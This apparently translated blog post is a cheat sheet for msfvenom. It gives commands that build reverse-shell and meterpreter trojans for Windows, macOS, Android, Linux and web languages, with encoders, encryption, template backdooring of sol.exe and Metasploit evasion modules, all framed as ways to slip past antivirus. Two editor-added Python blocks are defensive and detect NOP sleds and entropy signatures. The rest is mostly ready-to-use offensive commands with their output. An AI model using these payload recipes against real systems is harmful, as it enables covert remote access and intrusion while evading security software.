Backdoor trojan AV evasion: msfvenom and msf5 (evasion)


Pasting my usage notes; not much commentary, this is simple stuff.

msfvenom trojan generation for every platform (cheat sheet):

windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o payload.macho

android:
// the APK needs to be signed
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f apk -o payload.apk

powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f elf -o payload.elf

php:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f aspx -o payload.aspx

jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.jsp

war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.war

nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.js

python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.py

perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.pl

ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.rb

lua:
msfvenom -p cmd/unix/reverse_lua LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.lua

windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c

Common msfvenom parameters for obfuscation and AV evasion

MSFvenom options and usage
msfvenom -v or --var-name

Usage: -v, --var-name <name>
Specifies a custom variable name for certain output formats. Giving a name with -v changes the output variable from the default "buf" to whatever word you supply.

Default output example: [buf]

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
buf = ""
buf += "\xda\xdc\xd9\x74\x24\xf4\x5b\xba\xc5\x5e\xc1\x6a\x29"
...snip...
Output example with --var-name: [notBuf]

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
notBuf = ""
notBuf += "\xda\xd1\xd9\x74\x24\xf4\xbf\xf0\x1f\xb8\x27\x5a"
...snip...

msfvenom --help-formats
Use this option to list every payload format msfvenom supports.

root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
vbapplication, vbscript

msfvenom -n, --nopsled
Sometimes you need a few NOPs (no-ops) at the start of the payload. This option prepends a NOP sled of [-n length] bytes to the payload.

Before -n:

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e generic/none -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 299 (iteration=0)
generic/none chosen with final size 299
Payload size: 299 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of payload
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
...snip...
After -n:

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e generic/none -f python -n 26
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 299 (iteration=0)
generic/none chosen with final size 299
Successfully added NOP sled from x86/single_byte
Payload size: 325 bytes
buf = ""
buf += "\x98\xfd\x40\xf9\x43\x49\x40\x4a\x98\x49\xfd\x37\x43" **NOPs
buf += "\x42\xf5\x92\x42\x42\x98\xf8\xd6\x93\xf5\x92\x3f\x98"
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" **First line of payload
...snip...
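Seen from the defender's side, the -v and -n examples above make two points: the variable name in a dumped payload is arbitrary, so a detection must not key on "buf", and a sled of single-byte x86 instructions may precede the real code. The Python below is an example added by the editor; it is not from the original post or from Metasploit. It pulls the bytes out of a -f python or -f c style dump regardless of variable name and measures how long a run of single-byte NOP-equivalent opcodes sits at the front. The opcode set SINGLE_BYTE_NOPS is my own approximation of what such a generator can emit, not Metasploit's table; the sample dumps reuse the bytes printed in the -n and -v examples above; the 16-byte threshold is an arbitrary choice.

```python
import re
from dataclasses import dataclass

# Single-byte x86 instructions that a "single byte" NOP generator can emit
# without disturbing control flow. Assumption: the editor's approximation,
# not Metasploit's exact x86/single_byte table.
SINGLE_BYTE_NOPS = frozenset(
    [0x90,                               # nop
     0x98, 0x99,                         # cwde, cdq
     0x9B, 0x9E, 0x9F,                   # fwait, sahf, lahf
     0x27, 0x2F, 0x37, 0x3F,             # daa, das, aaa, aas
     0xD6, 0xF5,                         # salc, cmc
     0xF8, 0xF9, 0xFC, 0xFD]             # clc, stc, cld, std
    + list(range(0x91, 0x98))            # xchg eax, reg
    + list(range(0x40, 0x50))            # inc/dec reg
)

# One double-quoted run of \xHH escapes, as emitted by -f python and -f c.
HEX_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')
# The variable on the left of `= ""`, `+= "..."` or `unsigned char x[] =`.
VAR_NAME = re.compile(
    r'^\s*(?:unsigned\s+char\s+)?([A-Za-z_]\w*)\s*(?:\[\])?\s*\+?=', re.M)


@dataclass
class Triage:
    var_name: str
    payload: bytes
    leading_nops: int
    sled_detected: bool


def extract_bytes(dump: str) -> tuple[str, bytes]:
    """Return (variable name, concatenated bytes) from a msfvenom text dump."""
    m = VAR_NAME.search(dump)
    name = m.group(1) if m else "?"
    chunks = HEX_STRING.findall(dump)
    data = b"".join(bytes.fromhex(c.replace("\\x", "")) for c in chunks)
    return name, data


def leading_nop_run(data: bytes) -> int:
    """Length of the prefix made only of single-byte NOP-equivalent opcodes."""
    n = 0
    for b in data:
        if b not in SINGLE_BYTE_NOPS:
            break
        n += 1
    return n


def triage(dump: str, sled_threshold: int = 16) -> Triage:
    """Extract the bytes and flag a leading sled at or above the threshold."""
    name, data = extract_bytes(dump)
    run = leading_nop_run(data)
    return Triage(name, data, run, run >= sled_threshold)


# Constructed sample: the first three payload lines of the page's "-n 26" output.
SAMPLE_DUMP = r'''
root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e generic/none -f python -n 26
Payload size: 325 bytes
buf = ""
buf += "\x98\xfd\x40\xf9\x43\x49\x40\x4a\x98\x49\xfd\x37\x43"
buf += "\x42\xf5\x92\x42\x42\x98\xf8\xd6\x93\xf5\x92\x3f\x98"
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
'''

# Constructed sample: the renamed variable from the -v example, with no sled.
SAMPLE_NOTBUF = r'''
notBuf = ""
notBuf += "\xda\xd1\xd9\x74\x24\xf4\xbf\xf0\x1f\xb8\x27\x5a"
'''

if __name__ == "__main__":
    for dump in (SAMPLE_DUMP, SAMPLE_NOTBUF):
        t = triage(dump)
        print(f"{t.var_name}: {len(t.payload)} bytes, "
              f"{t.leading_nops} leading NOP-like bytes, sled={t.sled_detected}")
```

On the page's sample the run comes out as 27, not 26: the payload's own first byte 0xfc (cld) is itself a single-byte instruction, so the heuristic cannot find the exact boundary between sled and code. Use it as a "sled of at least N bytes" signal that is combined with other indicators, not as a cut point.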

msfvenom --smallest
With the --smallest option, msfvenom tries to create the smallest possible shellcode through its choice of encoder and payload.

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
...snip...

root@kali:~# msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python --smallest
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 312 (iteration=0)
x86/shikata_ga_nai chosen with final size 312
Payload size: 312 bytes
...snip...

msfvenom -c, --add-code
Specifies an additional win32 shellcode file to merge into the payload; below, two more payloads are chained together into one shellcode.

Payload #1:

root@kali:~# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="MSFU Example" -f raw > messageBox
No encoder or badchars specified, outputting raw payload
Payload size: 267 bytes
Adding payload #2:

root@kali:~# msfvenom -c messageBox -a x86 --platform windows -p windows/messagebox TEXT="We are evil" -f raw > messageBox2
Adding shellcode from messageBox to the payload
No encoder or badchars specified, outputting raw payload
Payload size: 850 bytes
Adding payload #3:

root@kali:~# msfvenom -c messageBox2 -a x86 --platform Windows -p windows/shell/bind_tcp -f exe -o cookies.exe
Adding shellcode from messageBox2 to the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1469 bytes
Saved as: cookies.exe
Running cookies.exe executes both message-box payloads, and the bind shell binds with its default configuration (port 4444).

msfvenom -x, --template & -k, --keep
-x/--template option:

  Specifies an existing executable to use as the template when creating an executable payload.

-k/--keep option:

  Keeps the template's normal behaviour and runs the injected payload as a separate thread.

root@kali:~# msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox lhost=192.168.101.133 -b "\x00" -f exe -o sol_bdoor.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 299 (iteration=0)
x86/shikata_ga_nai chosen with final size 299
Payload size: 299 bytes
Saved as: sol_bdoor.exe

After the Kali update, encrypted payloads for AV evasion are newly supported

-l  list payloads

-f  output file format

-e  encoder

-i  number of encoding iterations

-b  byte values that must not appear in the generated program

-x  lets us specify a custom executable as the template, i.e. the trojan is bundled into that executable.

--encrypt  encryption method
--encrypt-key  key

Encryption methods
This release added four encryption methods: AES256-CBC, RC4, XOR and Base64.
Usage:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f c

You can also use msf's evasion modules (show evasion) to get past Defender.

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
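Each of the four --encrypt methods above is applied with a key that ships alongside the payload, so for a defender the useful question is not whether the transform can be undone but what its output looks like to a scanner. The Python below is an example added by the editor, not code from the post or from Metasploit: it computes per-byte Shannon entropy and compares a raw, structured byte string (the first 13 bytes of the page's unencoded bind_tcp dump, repeated; a constructed sample) against single-byte XOR, repeating-key XOR, Base64 and a uniform byte distribution. xor_repeating is my own stand-in for a plain XOR scheme and says nothing about how msfvenom keys its XOR option; the key bytes are constructed.

```python
import base64
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a single repeated value, 8.0 for uniform."""
    if not data:
        return 0.0
    total = len(data)
    # Summing sorted counts makes equal histograms give bit-identical results.
    return -sum((c / total) * math.log2(c / total)
                for c in sorted(Counter(data).values()))


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the simplest reversible encoding (editor's stand-in)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed sample: first 13 bytes of the page's unencoded bind_tcp dump,
# repeated so the histogram has some weight. Stands in for plain shellcode.
RAW = bytes.fromhex("fce8820000006089e531c0648b") * 8


def compare_encodings(raw: bytes = RAW) -> dict[str, float]:
    """Entropy of the same bytes under several transforms a scanner may meet."""
    return {
        "raw": shannon_entropy(raw),
        # A single-byte key is a bijection on byte values: the histogram moves,
        # its shape does not, so the entropy is identical to "raw".
        "xor_1byte": shannon_entropy(xor_repeating(raw, b"\xaa")),
        # A multi-byte key spreads each input value over several outputs.
        "xor_5byte": shannon_entropy(xor_repeating(raw, b"\x13\x37\xc0\xde\x5a")),
        # Base64 uses at most 65 symbols, so it can never exceed log2(65) ~ 6.02.
        "base64": shannon_entropy(base64.b64encode(raw)),
        # Reference point for well-encrypted or random data.
        "uniform": shannon_entropy(bytes(range(256))),
    }


if __name__ == "__main__":
    for label, bits in compare_encodings().items():
        print(f"{label:>10}: {bits:.3f} bits/byte")
```

The practical reading: an entropy threshold on its own flags Base64 and AES/RC4 output and compressed data alike, and it misses single-byte XOR entirely, so the value is a triage signal to combine with context (where the blob sits, what decodes it, what the surrounding script does) rather than a verdict.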

msf5's built-in obfuscation is very weak.

After the update it has built-in obfuscation aimed at Windows Defender.

The results are mediocre; it stopped evading detection long ago.

Still better than nothing; combine it with other evasion techniques of your own.

show evasion

Not going into more detail; it is foolproof to use.

One last point: doing the reverse engineering and evasion work on the shellcode yourself is still the way to go.
